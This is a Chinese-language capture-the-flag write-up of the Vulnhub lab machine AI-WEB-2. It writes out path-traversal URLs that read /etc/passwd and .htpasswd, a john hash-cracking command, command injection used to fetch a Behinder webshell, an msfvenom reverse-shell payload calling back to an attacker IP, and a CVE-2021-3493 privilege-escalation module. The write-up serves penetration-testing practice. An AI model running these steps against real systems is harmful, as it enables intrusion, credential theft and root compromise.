文章

Vulnhub靶场笔记-AI-WEB2

AI-WEB-2

一、环境配置

更改网络适配器为NAT模式

image-20231108203932205

二、主机探测

在物理机中查看VMnet8网卡

image-20231108145349160

使用fscan探测AI-WEB-2靶机ip地址为:192.168.157.134

image-20231108204303667

image-20231108204437632

三、WEB信息收集

1
dirsearch -u http://192.168.157.134/

image-20231108204718190

存在/webadmin目录,但是需要账号密码

四、任意文件读取

看到有个注册的按钮,那就先注册一个账户进去。

image-20231108205146048

image-20231108205207683

通过搜索关键字找到FileSharing的历史漏洞:https://www.exploit-db.com/exploits/40009

image-20231108205501932

http://192.168.157.134/download.php?file_name=../../../../../../../../../../../../../etc/passwd

image-20231108205651243

http://192.168.157.134/download.php?file_name=../../../../../../../../../../etc/apache2/.htpasswd

利用任意文件读取apache系统认证文件,里面保存着账号密码。

image-20231108205808240

可通过爆破得到目录:/etc/apache2/.htpasswd 账号密码:aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/ 账号是aiweb2admin,密码被加密了,使用john解密一下。

1
john --wordlist=/usr/share/wordlists/rockyou.txt passwd  

image-20231108203226795

五、命令注入漏洞

输入账号密码认证后,/webadmin/存在robots.txt

image-20231108210219191

/H05Tpin9555中存在命令注入

image-20231108210348456

通过命令注入漏洞远程下载冰蝎马

kali中在木马所在目录启动http服务器

1
python3 -m http.server 8888

image-20231108210725428

远程下载冰蝎马

image-20231108210636473

冰蝎连接,因webadmin目录存在认证所以需要自定义请求头来通过认证

image-20231108210816438

image-20231108210923647

六、提权拿Flag

发现疑似ssh连接信息的文件

image-20231108211202056

User: n0nr00tuser
Cred: zxowieoi4sdsadpEClDws1sf

ssh连接

1
2
ssh n0nr00tuser@192.168.157.134
zxowieoi4sdsadpEClDws1sf

image-20231108211533221

上线msf

1
2
3
4
5
6
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.157.138 LPORT=4444 -f elf > shell.elf

use exploit/multi/handler
set LHOST 192.168.157.138
set payload linux/x64/meterpreter/reverse_tcp
run

利用冰蝎将shell.elf上传到/var/www/html/webadmin/H05Tpin9555/

image-20231108211721502

在给shell.elf赋权限时发现不允许,将shell.elf复制到可赋权的目录/tmp

1
2
3
4
cp shell.elf /tmp/
cd /tmp
chmod +x shell.elf
./shell.elf

image-20231108212023600

上线后按CTRL+Z选择y保存session

image-20231108212307838

提权cve-2021-3493

1
2
3
4
search cve-2021-3493
use 0
set SESSION 0
run

image-20231108212448933

image-20231108212541516

本文由作者按照 CC BY 4.0 进行授权